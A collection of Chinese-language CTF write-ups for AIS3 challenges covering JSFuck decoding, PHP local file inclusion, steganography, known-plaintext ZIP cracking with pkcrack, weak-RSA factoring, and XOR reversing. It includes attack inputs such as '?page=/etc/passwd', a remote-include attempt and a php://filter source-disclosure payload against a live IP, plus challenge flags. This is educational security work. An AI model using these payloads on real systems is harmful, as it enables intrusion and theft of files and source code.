YU-KAI HUANG

JSFuck

Keynote:

  • 可以只用 6 個字符 []()!+ 來編寫 JavaScript 程序

Reference:

  • http://www.jingwentian.com/t-413
  • http://codegolf.stackexchange.com/questions/28714/convert-jsfuck-to-normal-js

剛開始看到 code 時覺得是 javascript,試著把它跑起來

<!-- test.html -->
<html>
<head></had>
<body>
<script>
{ web2.txt }
</script>
</body>
</html>

結果出現了一個 ^_^ ,確定是一個可執行的 javascript

^_^

網路上得知 JSFuck,藉由他人所寫的 script ,把 jsfuck 轉換為一般 javaScript

<!- jsfuck-decoder.html ->
<html>
<head></had>
<body>
<script>
alert(/\n(.+)/.exec(eval(prompt().slice(0,-2)))[1]);
</script>
</body>
</html>

輸出結果

jsfuck_in-ais3's_web_question

YU-KAI HUANG

Local File Inclusion (LFI) vulnerability

Keynote:

  • php:// — Accessing various I/O streams

Reference:

  • http://security.stackexchange.com/questions/90724/reading-php-comments-using-php-page-that-open-text-files-ctf
  • https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

Tools:

  • Base64 Online Decode https://www.base64decode.org/

瀏覽 http://52.69.163.194/web1/?page=about 發現內容是 include 自 about.php

http://52.69.163.194/web1/about.php

發現輸入相對路徑去讀取檔案是不可行的,php 出錯而沒有輸出結果

http://52.69.163.194/web1/?page=../web1/about

想要讀取 /etc/passwd 也不可行

http://52.69.163.194/web1/?page=/etc/passwd

嘗試 include remote file 也不可行,allow_url_include 可能沒有開

http://52.69.163.194/web1/?page=http://somewhere/hackfile.php

最後解法是透過 php://filter 強迫 php 在 include file 之前,先把該檔案用 base64 編碼,之後網頁就吐出一堆 base64 文字串,再將文字串拿去 decode,就可以看到 php 原始碼,flag 就藏在裡面

http://52.69.163.194/web1/?page=php://filter/convert.base64-encode/resource=index

PGEgaHJlZj0nP3BhZ2U9YWJvdXQnPiBhYm91dCA8L2E+IDxiciAvPgo8YSBocmVmPSc/cGFnZT10ZXN0Jz4gdGVzdCA8L2E+IDxiciAvPgo8YnI+Cjxicj4KPD9waHAKCiAgICAgICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOwoKICAgICAgICAkcGFnZSA9ICRwYWdlIC4gJy5waHAnOwogICAgICAgICRwYWdlID0gc3RyX3JlcGxhY2UoIi4uLyIsICIiLCAkcGFnZSk7CiAgICAgICAgaW5jbHVkZSggJHBhZ2UgKTsKCiAgICAgICAgLy8gdGhlIGtleSBpcyBBSVMze3BocF93cmFwcGVyX3JvY2tzfQ==

decode:

<a href='?page=about'> about </a> <br />
<a href='?page=test'> test </a> <br />
<br>
<br>
<?php

        $page = $_GET['page'];

        $page = $page . '.php';
        $page = str_replace("../", "", $page);
        include( $page );

        // the key is AIS3{php_wrapper_rocks}
YU-KAI HUANG

Buffer Overflow Attack

Keynote:

  • stack

Tools:

  • pwntool

sub_4006AD:

pwn1_asm_in_ais3's_binary_question

pwn1_boa_in_ais3's_pwn3d_question

stack ??

-----ret-----
4
----var_4----
16
----var_20---
4
-----rbp-----
20
-----rsp-----
YU-KAI HUANG

File extension

Keynote:

  • gzip, tar, bmp

Tools:

  • stegsolve.jar: A steganographic image analyzer, solver and data extractor for challanges.

查看 c4 檔案類型

$ file c4

c4: gzip compressed data, from Unix

重新命名 c4 為 c4.gz

$ gzip -d c4

gzip: c4: unknown suffix -- ignored

$ mv c4 c4.gz
$ gzip -d c4.gz

解壓出一個 tar archive 的 c4,且 c4 裡面又包了 c4 ,為避免 overwrite ,改名再解壓

$ tar -zxvf c4

x c4: Refusing to overwrite archive
tar: Error exit delayed from previous errors.

$ tar -tvf c4
-rw-rw-r--  0 orange orange 345654 Jul 21 18:02 c4

$ mv c4 c4.tar
$ tar -zxvf c4.tar

x c4

$ file c4

c4: PC bitmap, Windows 3.x format, 480 x 240 x 24

此時 c4 為 bmp 圖片檔,隱約可以看到有字位於左下角

c4_bmp_in_ais3's_misc_question

利用 stegsolve.jar 去處理圖片,在 Red plane 2 模式時就可以清楚看到字了

c4_solved_bmp_in_ais3's_misc_question

YU-KAI HUANG

Known-plaintext attack

Keynote:

  • cracking ZIP Files
  • you need to have one of the original files contained in the encrypted archive

Reference:

  • https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files

Tools:

  • pkcrack

一開始先確認 facebook.zip 為 zip 檔

$ file facebook.zip

facebook.zip: Zip archive data, at least v1.0 to extract

打開後發現有加密,試著看壓縮檔裡面有什麼檔案

$ unzip -l facebook.zip

Archive:  facebook.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
       38  07-15-15 18:15   key.txt
        0  07-15-15 18:13   p960x960/
    26664  10-30-13 08:19   p960x960/851556_443281069111871_602278786_n.png
 --------                   -------
    26702                   3 files

藉由網路上的教學

you need to have one of the original files contained in the encrypted archive What you are going to do with it is you are going to compress it using the same compression method as the protected file. Remember this, otherwise it won’t work. So after you do that, move both your zip files, the encrypted one and the plaintext zip

去 google 找 851556_443281069111871_602278786_n.png

851556_443281069111871_602278786_n.png

壓縮該檔案(包含完整路徑)

$ zip -r plaintext.zip p960x960/851556_443281069111871_602278786_n.png
$ file plaintext.zip

Archive:  plaintext.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
    26664  07-25-15 00:09   p960x960/851556_443281069111871_602278786_n.png
 --------                   -------
    26664                   1 file

執行 pccrack

pkcrack -C facebook.zip -c “p960x960/851556_443281069111871_602278786_n.png” -P plaintext.zip -p “p960x960/851556_443281069111871_602278786_n.png” -d decrypted.zip -a

解壓縮 decrypted.zip,裡面的 key.txt 就放著 flag

YU-KAI HUANG

RSA Cracking

Keynote:

  • a 768 bit RSA crack when all you have is the file you want to decrypt, and the public key

Reference:

  • http://m0x39.blogspot.tw/2012/12/0x00-introduction-this-post-is-going-to.html
  • http://blog.orange.tw/2014/10/hack-in-box-2014-ctf-writeup-keygenme.html

Tools:

  • rsatool.py: https://github.com/ius/rsatool.git
  • Factordb: http://www.factordb.com
  • rsacrack.py:
usage: cat file python rsacrack.py -d [private key exponent] [public key modulus]
  • p = randomly chosen prime
  • q = randomly chosen prime
  • n = modulus for public and private keys(n=pq)
  • f(n)=(p-1)(q-1) :: f(n) counts the number of positive integers less than or equal to n that are relatively prime to n
  • e = exponent (chosen as 1 < e < f(n) && greatest common divisor of (e, f(n)) = 1… so e and f(n) are coprime) this is the public key exponent
  • d = e^-1(mod f(n)) or (de) = 1 mod f(n) — this is the private key exponent

在 rsa.py 裡已經有 public key 的 n, e ,藉由 Factordb 找出 p,q 兩個大質數

使用 rsatool.py 找出 private key 的 n, d

$ python rsatool.py -p 800644567978575682363895000391634967 -q 83024947846700869393771322159348359271173 -n 66473473500165594946611690873482355823120606837537154371392262259669981906291 -e 65537
Using (p, q) to initialise RSA instance

n =
92f6a717a4ca87fbb4e008b2ba036d8fc5ca22c8bb61060fef170ce6792ec573

e = 65537 (0x10001)

d =
480c35d4888c65e8073f81e424ff42c28879294c3c4954a295bf3880decf0659

p = 800644567978575682363895000391634967 (0x9a32d32db1c5be9aeac5de0daa5017)

q =
f3fd0751a4697130a74c96ce57bad29305

p.s 83024947846700869393771322159348359271173 (0xf3fd0751a4697130a74c96ce57bad29305)

使用 rsacrack.py

$ cat flag.enc | python rsacrack.py -d 480c35d4888c65e8073f81e424ff42c28879294c3c4954a295bf3880decf0659 92f6a717a4ca87fbb4e008b2ba036d8fc5ca22c8bb61060fef170ce6792ec573 | strings
AIS3{rsaaaaaaaaA_orz}

p.s

n = 0x92f6a717a4ca87fbb4e008b2ba036d8fc5ca22c8bb61060fef170ce6792ec573 = 66473473500165594946611690873482355823120606837537154371392262259669981906291

YU-KAI HUANG

Reference:

Keynote:

  • filename

Reference:

  • https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher

Tools:

  • Vigenere Cipher Decoder http://www.dcode.fr/vigenere-cipher
  • Vigenère Cipher Codebreaker http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx

藉由第一個連結找出可能的 key length,再由第二個連結,設定 key size 後找出所有的可能,並搜尋 “the key is” 找出可辨識的字串

vigenere_key_length_in_ais3's_crypto_question

vigenere_decode_in_ais3's_crypto_question

YU-KAI HUANG

64bit assembly code

Keynote:

  • little endian
  • xor

Tools:

  • ida64
  • XOR Calculator online https://xor.pw/
  • Hex to ASCII text converter http://www.rapidtables.com/convert/number/hex-to-ascii.htm

主要觀察 check1, check2, gg function

check1:

stupid_v2_check1_func_in_ais3's_binary_question

check2:

stupid_v2_check2_func_in_ais3's_binary_question

gg:

stupid_v2_gg_func_in_ais3's_binary_question

在 check1 時,to_reg function 會將 input 存入 rdx,key 的值為 0DDDDAAAADADADDAAh,經過運算:

key = (input) XOR 0DDDDAAAADADADDAAh

進入 check2 ,call gg function 並且 ax = 0 時即可進到正確的段落 “Yeah, It’s a flag !!! …”

進入 gg function,分兩次檢查 key 的值,總之 key 的值要為 0BFB7B8CEh 和 0BCB4DEC4h 的連接

key = (input) XOR 0DDDDAAAADADADDAAh
    = 0BCB4DEC4BFB7B8CEh

所以可得 input 值為 06169746e656d6564h 並拿去轉成 ascii,注意 little endian,反向讀取:

dementia

得到一個癡呆 :)

flag: AIS3{dementia}

YU-KAI HUANG

Shellcode to bin

Keynote:

  • shellcode
  • xor

Reference:

  • http://theloshackers.blogspot.tw/2013/08/convert-hex-shellcode-to-binary-mode.html

Tools:

  • ida64
  • XOR Calculator online https://xor.pw/
  • Hex to ASCII text converter http://www.rapidtables.com/convert/number/hex-to-ascii.htm

將 shellcode 輸出成 bin

$ echo -ne "{ shellcode }" > sc.bin

再丟到 ida 找到這個片段

sc_shellcode_to_bin_in_ais3's_binary_question

總共有 40 個字元在堆疊中,藉由 [rsi+rdx] 逐一讀取 stack 中的字元並與 0CCh 做 xor,直到 dl 為 37 (25h),也就是第 37 個字元為止

# origin

414141C6B1B9A3B5
93BEA3AA93A8A0BC
A1A5BF93BFA593A9
A8A3AFA0A0A9A4BF
93A7A3B7FF9F858D

# after xor
#[] : ignored

[    ]0a7d756f79
5f726f665f646c70
6d69735f73695f65
646f636c6c656873
5f6b6f7b33534941

Little Endian 系統,反向讀取並將 hex 轉為 ascii 就可以看到 flag

sc_converted_hex_to_ascii_in_ais3's_binary_question

YU-KAI HUANG

Strings

Keynote:

  • 動態分析

Tools:

  • ollyDbg201h

把 bin1.exe 丟到 ollydbg ,搜尋 string ‘AIS3’ 就可以找到 flag

bin1_exe_strings_in_ais3's_binary_question

有稍微的漏字,但就依照 flag 上的語義自己填補了

p.s

ollyDbg110 的 strings 比 ollyDbg201h 較不完整

ollyDbg201h 的 strings 仍然會漏字,仍不清楚原因